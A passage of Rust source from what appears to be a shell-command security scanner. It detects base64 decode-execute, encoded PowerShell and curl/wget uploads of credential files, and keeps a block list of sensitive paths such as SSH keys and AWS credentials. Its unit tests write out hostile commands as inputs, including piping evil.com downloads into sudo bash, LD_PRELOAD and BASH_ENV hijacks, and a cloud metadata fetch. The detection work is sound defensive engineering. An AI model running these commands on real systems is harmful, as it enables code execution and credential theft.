///    (`10.0.0.0/8`). If both the entry and `host` parse, that result is final
///    for the entry; otherwise the entry falls through to the name checks.
/// 2. **Exact** — ASCII case-insensitive equality.
/// 3. **Subdomain** — entry `example.com` or `.example.com` matches
///    `sub.example.com` (ASCII case-insensitive, and only on a label boundary,
///    so `notexample.com` does not match). A leading-dot entry matches
///    subdomains only, not the bare domain.
///
/// A single trailing dot (fully-qualified form, `example.com.`) is ignored on
/// both `host` and name entries.
fn matches_network_list(host: &str, list: &[String]) -> bool {
    // True when `host` ends with `.{domain}`, compared ASCII case-insensitively.
    fn is_subdomain_of(host: &str, domain: &str) -> bool {
        let (host, domain) = (host.as_bytes(), domain.as_bytes());
        if domain.is_empty() || host.len() <= domain.len() {
            return false;
        }
        let split = host.len() - domain.len();
        host[split - 1] == b'.' && host[split..].eq_ignore_ascii_case(domain)
    }

    let host = host.strip_suffix('.').unwrap_or(host);

    list.iter().any(|entry| {
        // CIDR match: "10.0.0.0/8"
        if entry.contains('/') {
            if let Some(matched) = cidr_contains(host, entry) {
                return matched;
            }
        }

        let entry = entry.strip_suffix('.').unwrap_or(entry);

        // Exact match
        if host.eq_ignore_ascii_case(entry) {
            return true;
        }

        // Subdomain match; a leading dot on the entry is optional.
        let domain = entry.strip_prefix('.').unwrap_or(entry);
        is_subdomain_of(host, domain)
    })
}

/// Check if an IPv4 address is within a CIDR range.
///
/// Returns `Some(true/false)` when `cidr` is `<ipv4>/<prefix>` with a prefix
/// length of at most 32 and `host` parses as an IPv4 address; returns `None`
/// if any of those parses fails.
fn cidr_contains(host: &str, cidr: &str) -> Option<bool> {
    let (network, prefix_len) = cidr.split_once('/')?;
    let network: std::net::Ipv4Addr = network.parse().ok()?;
    let prefix_len: u32 = prefix_len.parse().ok()?;
    if prefix_len > 32 {
        return None;
    }
    let host_ip: std::net::Ipv4Addr = host.parse().ok()?;

    // A /0 prefix would need a 32-bit shift, which `checked_shl` reports as
    // `None`; that case is the all-zero mask.
    let mask = u32::MAX.checked_shl(32 - prefix_len).unwrap_or(0);

    Some((u32::from(network) & mask) == (u32::from(host_ip) & mask))
}
2076
2077// ---------------------------------------------------------------------------
2078// Base64 decode-execute detection
2079// ---------------------------------------------------------------------------
2080
2081fn check_base64_decode_execute(
2082    segments: &[tokenize::Segment],
2083    shell: ShellType,
2084    findings: &mut Vec<Finding>,
2085) {
2086    // Pattern A: Pipe chain — base64 with decode flag piped to interpreter
2087    for (i, seg) in segments.iter().enumerate() {
2088        if let Some(ref cmd) = seg.command {
2089            let cmd_base = normalize_cmd_base(cmd, shell);
2090            if cmd_base == "base64" {
2091                let has_decode_flag = seg.args.iter().any(|arg| {
2092                    let norm = normalize_shell_token(arg, shell);
2093                    matches!(norm.as_str(), "-d" | "--decode" | "-D")
2094                });
2095                if has_decode_flag {
2096                    // Check if next piped segment is an interpreter
2097                    if let Some(next_seg) = segments.get(i + 1) {
2098                        if let Some(ref sep) = next_seg.preceding_separator {
2099                            if (sep == "|" || sep == "|&")
2100                                && resolve_interpreter_name(next_seg, shell).is_some()
2101                            {
2102                                findings.push(Finding {
2103                                    rule_id: RuleId::Base64DecodeExecute,
2104                                    severity: Severity::High,
2105                                    title: "Base64 decode piped to interpreter".to_string(),
2106                                    description: "Command decodes base64 content and pipes it directly to an interpreter for execution".to_string(),
2107                                    evidence: vec![Evidence::CommandPattern {
2108                                        pattern: "base64 decode | interpreter".to_string(),
2109                                        matched: redact::redact_shell_assignments(&format!(
2110                                            "{} | {}", seg.raw, next_seg.raw
2111                                        )),
2112                                    }],
2113                                    human_view: None,
2114                                    agent_view: None,
2115                                    mitre_id: None,
2116                                    custom_rule_id: None,
2117                                });
2118                            }
2119                        }
2120                    }
2121                }
2122            }
2123        }
2124
2125        // Also check: something piped to base64 -d piped to interpreter
2126        // e.g. echo X | base64 -d | bash — base64 is mid-chain
2127        if i >= 1 {
2128            if let Some(ref sep) = seg.preceding_separator {
2129                if sep == "|" || sep == "|&" {
2130                    if let Some(ref cmd) = seg.command {
2131                        let cmd_base = normalize_cmd_base(cmd, shell);
2132                        if cmd_base == "base64" {
2133                            let has_decode = seg.args.iter().any(|arg| {
2134                                let norm = normalize_shell_token(arg, shell);
2135                                matches!(norm.as_str(), "-d" | "--decode" | "-D")
2136                            });
2137                            if has_decode {
2138                                if let Some(next_seg) = segments.get(i + 1) {
2139                                    if let Some(ref next_sep) = next_seg.preceding_separator {
2140                                        if (next_sep == "|" || next_sep == "|&")
2141                                            && resolve_interpreter_name(next_seg, shell).is_some()
2142                                        {
2143                                            // Only fire if we didn't already fire above (when i was the base64 segment)
2144                                            let already_found = findings
2145                                                .iter()
2146                                                .any(|f| f.rule_id == RuleId::Base64DecodeExecute);
2147                                            if !already_found {
2148                                                findings.push(Finding {
2149                                                    rule_id: RuleId::Base64DecodeExecute,
2150                                                    severity: Severity::High,
2151                                                    title: "Base64 decode piped to interpreter".to_string(),
2152                                                    description: "Command decodes base64 content and pipes it directly to an interpreter for execution".to_string(),
2153                                                    evidence: vec![Evidence::CommandPattern {
2154                                                        pattern: "base64 decode | interpreter".to_string(),
2155                                                        matched: redact::redact_shell_assignments(&format!(
2156                                                            "{} | {}", seg.raw, next_seg.raw
2157                                                        )),
2158                                                    }],
2159                                                    human_view: None,
2160                                                    agent_view: None,
2161                                                    mitre_id: None,
2162                                                    custom_rule_id: None,
2163                                                });
2164                                            }
2165                                        }
2166                                    }
2167                                }
2168                            }
2169                        }
2170                    }
2171                }
2172            }
2173        }
2174    }
2175
2176    // Pattern B: Inline decode-execute — interpreter -c/-e with decode+execute tokens
2177    // Uses resolve_interpreter_name to handle wrappers (sudo, env, command, nohup, exec)
2178    for seg in segments {
2179        // Resolve through wrappers: sudo python → python, env node → node
2180        let interpreter = if let Some(ref cmd) = seg.command {
2181            let cmd_base = normalize_cmd_base(cmd, shell);
2182            if is_interpreter(&cmd_base) {
2183                Some(cmd_base)
2184            } else {
2185                resolve_interpreter_name(seg, shell)
2186            }
2187        } else {
2188            None
2189        };
2190
2191        if let Some(interp) = interpreter {
2192            // Check ALL args (including wrapper args) for -c/-e and decode+execute tokens
2193            let has_exec_flag = seg.args.iter().any(|arg| {
2194                let norm = normalize_shell_token(arg, shell);
2195                norm == "-c" || norm == "-e"
2196            });
2197            if has_exec_flag {
2198                let args_joined = seg.args.join(" ");
2199                let lower = args_joined.to_lowercase();
2200                let has_decode_exec = (lower.contains("b64decode") && lower.contains("exec"))
2201                    || (lower.contains("atob") && lower.contains("eval"))
2202                    || (lower.contains("buffer.from") && lower.contains("eval"));
2203                if has_decode_exec {
2204                    findings.push(Finding {
2205                        rule_id: RuleId::Base64DecodeExecute,
2206                        severity: Severity::High,
2207                        title: "Inline base64 decode-execute".to_string(),
2208                        description: format!(
2209                            "Interpreter '{interp}' executes code with base64 decode and eval/exec co-occurrence"
2210                        ),
2211                        evidence: vec![Evidence::CommandPattern {
2212                            pattern: "interpreter -c/e with decode+execute".to_string(),
2213                            matched: redact::redact_shell_assignments(&seg.raw),
2214                        }],
2215                        human_view: None,
2216                        agent_view: None,
2217                        mitre_id: None,
2218                        custom_rule_id: None,
2219                    });
2220                }
2221            }
2222        }
2223    }
2224
2225    // Pattern C: PowerShell -EncodedCommand / -enc / -ec
2226    for seg in segments {
2227        if let Some(ref cmd) = seg.command {
2228            let cmd_base = normalize_cmd_base(cmd, shell);
2229            if cmd_base == "powershell" || cmd_base == "pwsh" {
2230                let has_enc_flag = seg.args.iter().any(|arg| {
2231                    let norm = normalize_shell_token(arg, shell);
2232                    let lower = norm.to_lowercase();
2233                    lower == "-encodedcommand" || lower == "-enc" || lower == "-ec"
2234                });
2235                if has_enc_flag {
2236                    findings.push(Finding {
2237                        rule_id: RuleId::Base64DecodeExecute,
2238                        severity: Severity::High,
2239                        title: "PowerShell encoded command".to_string(),
2240                        description: format!(
2241                            "PowerShell ({cmd_base}) invoked with -EncodedCommand, executing base64-encoded script"
2242                        ),
2243                        evidence: vec![Evidence::CommandPattern {
2244                            pattern: "powershell -EncodedCommand".to_string(),
2245                            matched: redact::redact_shell_assignments(&seg.raw),
2246                        }],
2247                        human_view: None,
2248                        agent_view: None,
2249                        mitre_id: None,
2250                        custom_rule_id: None,
2251                    });
2252                }
2253            }
2254        }
2255    }
2256}
2257
2258// ---------------------------------------------------------------------------
2259// Data exfiltration detection (POSIX + Fish: curl/wget upload of sensitive data)
2260// ---------------------------------------------------------------------------
2261
/// Sensitive file paths for data exfiltration detection.
const SENSITIVE_PATHS: &[&str] = &[
    "/etc/passwd",
    "/etc/shadow",
    "~/.ssh/id_rsa",
    "~/.ssh/id_ed25519",
    "~/.ssh/id_ecdsa",
    "~/.ssh/id_dsa",
    "~/.aws/credentials",
    "~/.kube/config",
    "~/.docker/config.json",
    "~/.gnupg/",
    "~/.netrc",
    "~/.git-credentials",
];

/// True when `value`, after dropping any leading `@` characters, contains one
/// of the `SENSITIVE_PATHS` entries as a substring.
fn is_sensitive_file_ref(value: &str) -> bool {
    let path = value.trim_start_matches('@');
    for sensitive in SENSITIVE_PATHS {
        if path.contains(sensitive) {
            return true;
        }
    }
    false
}
2282
2283fn has_sensitive_env_ref(value: &str) -> bool {
2284    use crate::rules::shared::SENSITIVE_KEY_VARS;
2285    for var in SENSITIVE_KEY_VARS {
2286        // $VAR or ${VAR}
2287        if value.contains(&format!("${var}")) || value.contains(&format!("${{{var}}}")) {
2288            return true;
2289        }
2290    }
2291    false
2292}
2293
2294fn has_sensitive_cmd_substitution(value: &str) -> bool {
2295    // Check for $(cmd) with sensitive paths — no backtick detection (PowerShell conflict)
2296    if let Some(start) = value.find("$(") {
2297        let rest = &value[start..];
2298        return SENSITIVE_PATHS.iter().any(|p| rest.contains(p));
2299    }
2300    false
2301}
2302
2303fn check_data_exfiltration(
2304    segments: &[tokenize::Segment],
2305    shell: ShellType,
2306    findings: &mut Vec<Finding>,
2307) {
2308    for seg in segments {
2309        let Some(ref cmd) = seg.command else {
2310            continue;
2311        };
2312        let cmd_base = normalize_cmd_base(cmd, shell);
2313
2314        match cmd_base.as_str() {
2315            "curl" => check_curl_exfiltration(seg, shell, findings),
2316            "wget" => check_wget_exfiltration(seg, shell, findings),
2317            _ => {}
2318        }
2319    }
2320}
2321
2322fn check_curl_exfiltration(seg: &tokenize::Segment, shell: ShellType, findings: &mut Vec<Finding>) {
2323    let args = &seg.args;
2324    let mut i = 0;
2325    while i < args.len() {
2326        let norm = normalize_shell_token(&args[i], shell);
2327
2328        // -d / --data / --data-binary / --data-raw / --data-urlencode
2329        let is_data_flag =
2330            norm == "-d" || norm.starts_with("--data") || norm.starts_with("-d") && norm.len() > 2; // combined form -dVAL
2331
2332        // -F / --form
2333        let is_form_flag =
2334            norm == "-F" || norm.starts_with("--form") || norm.starts_with("-F") && norm.len() > 2;
2335
2336        // -T / --upload-file
2337        let is_upload_flag = norm == "-T" || norm.starts_with("--upload-file");
2338
2339        if is_data_flag || is_form_flag || is_upload_flag {
2340            // Get the value: either from =VAL, combined form, or next arg
2341            let value = if let Some(eq_pos) = norm.find('=') {
2342                Some(norm[eq_pos + 1..].to_string())
2343            } else if (norm == "-d"
2344                || norm == "-F"
2345                || norm == "-T"
2346                || norm == "--data"
2347                || norm == "--data-binary"
2348                || norm == "--data-raw"
2349                || norm == "--data-urlencode"
2350                || norm == "--form"
2351                || norm == "--upload-file")
2352                && i + 1 < args.len()
2353            {
2354                i += 1;
2355                Some(normalize_shell_token(&args[i], shell))
2356            } else if norm.starts_with("-d") && norm.len() > 2 {
2357                // Combined -dVAL
2358                Some(norm[2..].to_string())
2359            } else if norm.starts_with("-F") && norm.len() > 2 {
2360                // Combined -FVAL
2361                Some(norm[2..].to_string())
2362            } else {
2363                None
2364            };
2365
2366            if let Some(val) = value {
2367                let is_sensitive = if is_upload_flag {
2368                    // -T uses direct file paths (no @)
2369                    SENSITIVE_PATHS.iter().any(|p| val.contains(p))
2370                } else {
2371                    is_sensitive_file_ref(&val)
2372                        || has_sensitive_env_ref(&val)
2373                        || has_sensitive_cmd_substitution(&val)
2374                };
2375
2376                if is_sensitive {
2377                    findings.push(Finding {
2378                        rule_id: RuleId::DataExfiltration,
2379                        severity: Severity::High,
2380                        title: "Data exfiltration via curl upload".to_string(),
2381                        description: "curl command uploads sensitive data (credentials, keys, or private files) to a remote server".to_string(),
2382                        evidence: vec![Evidence::CommandPattern {
2383                            pattern: "curl upload sensitive data".to_string(),
2384                            matched: redact::redact_shell_assignments(&seg.raw),
2385                        }],
2386                        human_view: None,
2387                        agent_view: None,
2388                        mitre_id: None,
2389                        custom_rule_id: None,
2390                    });
2391                    return; // One finding per segment
2392                }
2393            }
2394        }
2395        i += 1;
2396    }
2397}
2398
2399fn check_wget_exfiltration(seg: &tokenize::Segment, shell: ShellType, findings: &mut Vec<Finding>) {
2400    let args = &seg.args;
2401    let mut i = 0;
2402    while i < args.len() {
2403        let norm = normalize_shell_token(&args[i], shell);
2404
2405        let is_post_data = norm.starts_with("--post-data");
2406        let is_post_file = norm.starts_with("--post-file");
2407
2408        if is_post_data || is_post_file {
2409            let value = if let Some(eq_pos) = norm.find('=') {
2410                Some(norm[eq_pos + 1..].to_string())
2411            } else if i + 1 < args.len() {
2412                i += 1;
2413                Some(normalize_shell_token(&args[i], shell))
2414            } else {
2415                None
2416            };
2417
2418            if let Some(val) = value {
2419                let is_sensitive = if is_post_file {
2420                    SENSITIVE_PATHS.iter().any(|p| val.contains(p))
2421                } else {
2422                    is_sensitive_file_ref(&val)
2423                        || has_sensitive_env_ref(&val)
2424                        || has_sensitive_cmd_substitution(&val)
2425                };
2426
2427                if is_sensitive {
2428                    findings.push(Finding {
2429                        rule_id: RuleId::DataExfiltration,
2430                        severity: Severity::High,
2431                        title: "Data exfiltration via wget upload".to_string(),
2432                        description: "wget command uploads sensitive data (credentials, keys, or private files) to a remote server".to_string(),
2433                        evidence: vec![Evidence::CommandPattern {
2434                            pattern: "wget upload sensitive data".to_string(),
2435                            matched: redact::redact_shell_assignments(&seg.raw),
2436                        }],
2437                        human_view: None,
2438                        agent_view: None,
2439                        mitre_id: None,
2440                        custom_rule_id: None,
2441                    });
2442                    return;
2443                }
2444            }
2445        }
2446        i += 1;
2447    }
2448}
2449
2450#[cfg(test)]
2451mod tests {
2452    use super::*;
2453
2454    /// Helper: run `check()` with no cwd and Exec context (the common case for tests).
2455    fn check_default(input: &str, shell: ShellType) -> Vec<Finding> {
2456        check(input, shell, None, ScanContext::Exec)
2457    }
2458
2459    #[test]
2460    fn test_pipe_sudo_flags_detected() {
2461        let findings = check_default(
2462            "curl https://evil.com | sudo -u root bash",
2463            ShellType::Posix,
2464        );
2465        assert!(
2466            findings
2467                .iter()
2468                .any(|f| matches!(f.rule_id, RuleId::CurlPipeShell | RuleId::PipeToInterpreter)),
2469            "should detect pipe through sudo -u root bash"
2470        );
2471    }
2472
2473    #[test]
2474    fn test_pipe_sudo_long_flag_detected() {
2475        let findings = check_default(
2476            "curl https://evil.com | sudo --user=root bash",
2477            ShellType::Posix,
2478        );
2479        assert!(
2480            findings
2481                .iter()
2482                .any(|f| matches!(f.rule_id, RuleId::CurlPipeShell | RuleId::PipeToInterpreter)),
2483            "should detect pipe through sudo --user=root bash"
2484        );
2485    }
2486
2487    #[test]
2488    fn test_pipe_env_var_assignment_detected() {
2489        let findings = check_default("curl https://evil.com | env VAR=1 bash", ShellType::Posix);
2490        assert!(
2491            findings
2492                .iter()
2493                .any(|f| matches!(f.rule_id, RuleId::CurlPipeShell | RuleId::PipeToInterpreter)),
2494            "should detect pipe through env VAR=1 bash"
2495        );
2496    }
2497
2498    #[test]
2499    fn test_pipe_env_u_flag_detected() {
2500        let findings = check_default("curl https://evil.com | env -u HOME bash", ShellType::Posix);
2501        assert!(
2502            findings
2503                .iter()
2504                .any(|f| matches!(f.rule_id, RuleId::CurlPipeShell | RuleId::PipeToInterpreter)),
2505            "should detect pipe through env -u HOME bash"
2506        );
2507    }
2508
2509    #[test]
2510    fn test_dotfile_overwrite_detected() {
2511        let cases = [
2512            "echo malicious > ~/.bashrc",
2513            "echo malicious >> ~/.bashrc",
2514            "curl https://evil.com > ~/.bashrc",
2515            "cat payload > ~/.profile",
2516            "echo test > $HOME/.bashrc",
2517        ];
2518        for input in &cases {
2519            let findings = check_default(input, ShellType::Posix);
2520            eprintln!(
2521                "INPUT: {:?} -> findings: {:?}",
2522                input,
2523                findings.iter().map(|f| &f.rule_id).collect::<Vec<_>>()
2524            );
2525            assert!(
2526                findings
2527                    .iter()
2528                    .any(|f| f.rule_id == RuleId::DotfileOverwrite),
2529                "should detect dotfile overwrite in: {input}",
2530            );
2531        }
2532    }
2533
2534    #[test]
2535    fn test_pipe_env_s_flag_detected() {
2536        let findings = check_default("curl https://evil.com | env -S bash -x", ShellType::Posix);
2537        assert!(
2538            findings
2539                .iter()
2540                .any(|f| matches!(f.rule_id, RuleId::CurlPipeShell | RuleId::PipeToInterpreter)),
2541            "should detect pipe through env -S bash -x"
2542        );
2543    }
2544
2545    #[test]
2546    fn test_pipe_sudo_env_detected() {
2547        let findings = check_default(
2548            "curl https://evil.com | sudo env VAR=1 bash",
2549            ShellType::Posix,
2550        );
2551        assert!(
2552            findings
2553                .iter()
2554                .any(|f| matches!(f.rule_id, RuleId::CurlPipeShell | RuleId::PipeToInterpreter)),
2555            "should detect pipe through sudo env VAR=1 bash"
2556        );
2557    }
2558
2559    #[test]
2560    fn test_httpie_pipe_bash() {
2561        let findings = check_default("http https://evil.com/install.sh | bash", ShellType::Posix);
2562        assert!(
2563            findings
2564                .iter()
2565                .any(|f| f.rule_id == RuleId::HttpiePipeShell),
2566            "should detect HTTPie pipe to bash"
2567        );
2568    }
2569
2570    #[test]
2571    fn test_httpie_https_pipe_bash() {
2572        let findings = check_default("https https://evil.com/install.sh | bash", ShellType::Posix);
2573        assert!(
2574            findings
2575                .iter()
2576                .any(|f| f.rule_id == RuleId::HttpiePipeShell),
2577            "should detect HTTPie https pipe to bash"
2578        );
2579    }
2580
2581    #[test]
2582    fn test_xh_pipe_bash() {
2583        let findings = check_default("xh https://evil.com/install.sh | bash", ShellType::Posix);
2584        assert!(
2585            findings.iter().any(|f| f.rule_id == RuleId::XhPipeShell),
2586            "should detect xh pipe to bash"
2587        );
2588    }
2589
2590    #[test]
2591    fn test_xh_pipe_sudo_bash() {
2592        let findings = check_default(
2593            "xh https://evil.com/install.sh | sudo bash",
2594            ShellType::Posix,
2595        );
2596        assert!(
2597            findings.iter().any(|f| f.rule_id == RuleId::XhPipeShell),
2598            "should detect xh pipe to sudo bash"
2599        );
2600    }
2601
2602    #[test]
2603    fn test_httpie_no_pipe_safe() {
2604        let findings = check_default("http https://example.com/api/data", ShellType::Posix);
2605        assert!(
2606            !findings
2607                .iter()
2608                .any(|f| f.rule_id == RuleId::HttpiePipeShell),
2609            "HTTPie without pipe should not trigger"
2610        );
2611    }
2612
2613    #[test]
2614    fn test_xh_no_pipe_safe() {
2615        let findings = check_default("xh https://example.com/api/data", ShellType::Posix);
2616        assert!(
2617            !findings.iter().any(|f| f.rule_id == RuleId::XhPipeShell),
2618            "xh without pipe should not trigger"
2619        );
2620    }
2621
2622    #[test]
2623    fn test_export_ld_preload() {
2624        let findings = check_default("export LD_PRELOAD=/evil/lib.so", ShellType::Posix);
2625        assert!(
2626            findings
2627                .iter()
2628                .any(|f| f.rule_id == RuleId::CodeInjectionEnv),
2629            "should detect LD_PRELOAD export"
2630        );
2631    }
2632
2633    #[test]
2634    fn test_export_bash_env() {
2635        let findings = check_default("export BASH_ENV=/tmp/evil.sh", ShellType::Posix);
2636        assert!(
2637            findings
2638                .iter()
2639                .any(|f| f.rule_id == RuleId::ShellInjectionEnv),
2640            "should detect BASH_ENV export"
2641        );
2642    }
2643
2644    #[test]
2645    fn test_export_pythonpath() {
2646        let findings = check_default("export PYTHONPATH=/evil/modules", ShellType::Posix);
2647        assert!(
2648            findings
2649                .iter()
2650                .any(|f| f.rule_id == RuleId::InterpreterHijackEnv),
2651            "should detect PYTHONPATH export"
2652        );
2653    }
2654
2655    #[test]
2656    fn test_export_openai_key() {
2657        let findings = check_default("export OPENAI_API_KEY=sk-abc123", ShellType::Posix);
2658        assert!(
2659            findings
2660                .iter()
2661                .any(|f| f.rule_id == RuleId::SensitiveEnvExport),
2662            "should detect OPENAI_API_KEY export"
2663        );
2664    }
2665
2666    #[test]
2667    fn test_export_path_safe() {
2668        let findings = check_default("export PATH=/usr/bin:$PATH", ShellType::Posix);
2669        assert!(
2670            !findings.iter().any(|f| matches!(
2671                f.rule_id,
2672                RuleId::CodeInjectionEnv
2673                    | RuleId::ShellInjectionEnv
2674                    | RuleId::InterpreterHijackEnv
2675                    | RuleId::SensitiveEnvExport
2676            )),
2677            "export PATH should not trigger env var detection"
2678        );
2679    }
2680
2681    #[test]
2682    fn test_env_ld_preload_cmd() {
2683        let findings = check_default(
2684            "env LD_PRELOAD=/evil/lib.so /usr/bin/target",
2685            ShellType::Posix,
2686        );
2687        assert!(
2688            findings
2689                .iter()
2690                .any(|f| f.rule_id == RuleId::CodeInjectionEnv),
2691            "should detect LD_PRELOAD via env command"
2692        );
2693    }
2694
2695    #[test]
2696    fn test_curl_metadata_endpoint() {
2697        let findings = check_default(
2698            "curl http://169.254.169.254/latest/meta-data",
2699            ShellType::Posix,
2700        );
2701        assert!(
2702            findings
2703                .iter()
2704                .any(|f| f.rule_id == RuleId::MetadataEndpoint),
2705            "should detect AWS metadata endpoint"
2706        );
2707    }
2708
2709    #[test]
2710    fn test_curl_private_network() {
2711        let findings = check_default("curl http://10.0.0.1/internal/api", ShellType::Posix);
2712        assert!(
2713            findings
2714                .iter()
2715                .any(|f| f.rule_id == RuleId::PrivateNetworkAccess),
2716            "should detect private network access"
2717        );
2718    }
2719
2720    #[test]
2721    fn test_curl_public_ip_safe() {
2722        let findings = check_default("curl http://8.8.8.8/dns-query", ShellType::Posix);
2723        assert!(
2724            !findings.iter().any(|f| matches!(
2725                f.rule_id,
2726                RuleId::MetadataEndpoint | RuleId::PrivateNetworkAccess
2727            )),
2728            "public IP should not trigger network destination detection"
2729        );
2730    }
2731
2732    #[test]
2733    fn test_metadata_bare_ip() {
2734        let findings = check_default("curl 169.254.169.254/latest/meta-data", ShellType::Posix);
2735        assert!(
2736            findings
2737                .iter()
2738                .any(|f| f.rule_id == RuleId::MetadataEndpoint),
2739            "should detect bare IP metadata endpoint"
2740        );
2741    }
2742
2743    #[test]
2744    fn test_extract_host_from_url() {
2745        assert_eq!(
2746            extract_host_from_arg("http://169.254.169.254/latest"),
2747            Some("169.254.169.254".to_string())
2748        );
2749        assert_eq!(
2750            extract_host_from_arg("http://10.0.0.1:8080/api"),
2751            Some("10.0.0.1".to_string())
2752        );
2753        assert_eq!(
2754            extract_host_from_arg("169.254.169.254/path"),
2755            Some("169.254.169.254".to_string())
2756        );
2757        assert_eq!(
2758            extract_host_from_arg("8.8.8.8"),
2759            Some("8.8.8.8".to_string())
2760        );
2761        assert_eq!(extract_host_from_arg("-H"), None);
2762        assert_eq!(extract_host_from_arg("output.txt"), None);
2763    }
2764
2765    // --- Network policy tests ---
2766
2767    #[test]
2768    fn test_network_policy_deny_exact() {
2769        let deny = vec!["evil.com".to_string()];
2770        let allow = vec![];
2771        let findings = check_network_policy(
2772            "curl https://evil.com/data",
2773            ShellType::Posix,
2774            &deny,
2775            &allow,
2776        );
2777        assert_eq!(findings.len(), 1);
2778        assert_eq!(findings[0].rule_id, RuleId::CommandNetworkDeny);
2779    }
2780
2781    #[test]
2782    fn test_network_policy_deny_subdomain() {
2783        let deny = vec!["evil.com".to_string()];
2784        let allow = vec![];
2785        let findings = check_network_policy(
2786            "wget https://sub.evil.com/data",
2787            ShellType::Posix,
2788            &deny,
2789            &allow,
2790        );
2791        assert_eq!(findings.len(), 1);
2792        assert_eq!(findings[0].rule_id, RuleId::CommandNetworkDeny);
2793    }
2794
2795    #[test]
2796    fn test_network_policy_deny_cidr() {
2797        let deny = vec!["10.0.0.0/8".to_string()];
2798        let allow = vec![];
2799        let findings =
2800            check_network_policy("curl http://10.1.2.3/api", ShellType::Posix, &deny, &allow);
2801        assert_eq!(findings.len(), 1);
2802        assert_eq!(findings[0].rule_id, RuleId::CommandNetworkDeny);
2803    }
2804
2805    #[test]
2806    fn test_network_policy_allow_exempts() {
2807        let deny = vec!["evil.com".to_string()];
2808        let allow = vec!["safe.evil.com".to_string()];
2809        let findings = check_network_policy(
2810            "curl https://safe.evil.com/data",
2811            ShellType::Posix,
2812            &deny,
2813            &allow,
2814        );
2815        assert_eq!(findings.len(), 0, "allow list should exempt from deny");
2816    }
2817
2818    #[test]
2819    fn test_network_policy_no_match() {
2820        let deny = vec!["evil.com".to_string()];
2821        let allow = vec![];
2822        let findings = check_network_policy(
2823            "curl https://example.com/data",
2824            ShellType::Posix,
2825            &deny,
2826            &allow,
2827        );
2828        assert_eq!(findings.len(), 0);
2829    }
2830
2831    #[test]
2832    fn test_network_policy_empty_deny() {
2833        let deny = vec![];
2834        let allow = vec![];
2835        let findings =
2836            check_network_policy("curl https://evil.com", ShellType::Posix, &deny, &allow);
2837        assert_eq!(
2838            findings.len(),
2839            0,
2840            "empty deny list should produce no findings"
2841        );
2842    }
2843
2844    #[test]
2845    fn test_cidr_contains() {
2846        assert_eq!(cidr_contains("10.0.0.1", "10.0.0.0/8"), Some(true));
2847        assert_eq!(cidr_contains("10.255.255.255", "10.0.0.0/8"), Some(true));
2848        assert_eq!(cidr_contains("11.0.0.1", "10.0.0.0/8"), Some(false));
2849        assert_eq!(cidr_contains("192.168.1.1", "192.168.0.0/16"), Some(true));
2850        assert_eq!(cidr_contains("192.169.1.1", "192.168.0.0/16"), Some(false));
2851        assert_eq!(cidr_contains("not-an-ip", "10.0.0.0/8"), None);
2852        assert_eq!(cidr_contains("10.0.0.1", "invalid"), None);
2853    }
2854
2855    #[test]
2856    fn test_matches_network_list_hostname() {
2857        let list = vec!["evil.com".to_string(), "bad.org".to_string()];
2858        assert!(matches_network_list("evil.com", &list));
2859        assert!(matches_network_list("sub.evil.com", &list));
2860        assert!(!matches_network_list("notevil.com", &list));
2861        assert!(!matches_network_list("good.com", &list));
2862    }
2863
2864    #[test]
2865    fn test_flag_value_url_detected_in_network_policy() {
2866        let deny = vec!["evil.com".to_string()];
2867        let allow = vec![];
2868        let findings = check_network_policy(
2869            "curl --url=http://evil.com/data",
2870            ShellType::Posix,
2871            &deny,
2872            &allow,
2873        );
2874        assert_eq!(findings.len(), 1, "should detect denied host in --flag=URL");
2875        assert_eq!(findings[0].rule_id, RuleId::CommandNetworkDeny);
2876    }
2877
2878    #[test]
2879    fn test_flag_value_url_metadata_endpoint() {
2880        let findings = check(
2881            "curl --url=http://169.254.169.254/latest/meta-data",
2882            ShellType::Posix,
2883            None,
2884            ScanContext::Exec,
2885        );
2886        assert!(
2887            findings
2888                .iter()
2889                .any(|f| f.rule_id == RuleId::MetadataEndpoint),
2890            "should detect metadata endpoint in --flag=URL"
2891        );
2892    }
2893
2894    #[test]
2895    fn test_flag_value_url_private_network() {
2896        let findings = check(
2897            "curl --url=http://10.0.0.1/internal",
2898            ShellType::Posix,
2899            None,
2900            ScanContext::Exec,
2901        );
2902        assert!(
2903            findings
2904                .iter()
2905                .any(|f| f.rule_id == RuleId::PrivateNetworkAccess),
2906            "should detect private network in --flag=URL"
2907        );
2908    }
2909
2910    #[test]
2911    fn test_strip_port_unbracketed_ipv6() {
2912        assert_eq!(strip_port("fe80::1"), "fe80::1");
2913    }
2914
2915    #[test]
2916    fn test_vet_not_configured_fires_without_supply_chain() {
2917        let dir = tempfile::tempdir().unwrap();
2918        let cwd = dir.path().to_str().unwrap();
2919        let findings = check(
2920            "cargo install serde_json",
2921            ShellType::Posix,
2922            Some(cwd),
2923            ScanContext::Exec,
2924        );
2925        assert!(findings
2926            .iter()
2927            .any(|f| f.rule_id == RuleId::VetNotConfigured));
2928    }
2929
2930    #[test]
2931    fn test_vet_not_configured_suppressed_with_supply_chain() {
2932        let dir = tempfile::tempdir().unwrap();
2933        let sc_dir = dir.path().join("supply-chain");
2934        std::fs::create_dir_all(&sc_dir).unwrap();
2935        std::fs::write(sc_dir.join("config.toml"), "").unwrap();
2936        let cwd = dir.path().to_str().unwrap();
2937        let findings = check(
2938            "cargo install serde_json",
2939            ShellType::Posix,
2940            Some(cwd),
2941            ScanContext::Exec,
2942        );
2943        assert!(!findings
2944            .iter()
2945            .any(|f| f.rule_id == RuleId::VetNotConfigured));
2946    }
2947
2948    #[test]
2949    fn test_vet_not_configured_skips_non_install() {
2950        let dir = tempfile::tempdir().unwrap();
2951        let cwd = dir.path().to_str().unwrap();
2952        let findings = check(
2953            "cargo build",
2954            ShellType::Posix,
2955            Some(cwd),
2956            ScanContext::Exec,
2957        );
2958        assert!(!findings
2959            .iter()
2960            .any(|f| f.rule_id == RuleId::VetNotConfigured));
2961    }
2962
2963    #[test]
2964    fn test_vet_detects_cargo_with_flags() {
2965        let dir = tempfile::tempdir().unwrap();
2966        let cwd = dir.path().to_str().unwrap();
2967        let f1 = check(
2968            "cargo --locked install serde",
2969            ShellType::Posix,
2970            Some(cwd),
2971            ScanContext::Exec,
2972        );
2973        assert!(f1.iter().any(|f| f.rule_id == RuleId::VetNotConfigured));
2974        let f2 = check(
2975            "cargo +nightly add tokio",
2976            ShellType::Posix,
2977            Some(cwd),
2978            ScanContext::Exec,
2979        );
2980        assert!(f2.iter().any(|f| f.rule_id == RuleId::VetNotConfigured));
2981        let f3 = check(
2982            "cargo -Z sparse-registry install serde",
2983            ShellType::Posix,
2984            Some(cwd),
2985            ScanContext::Exec,
2986        );
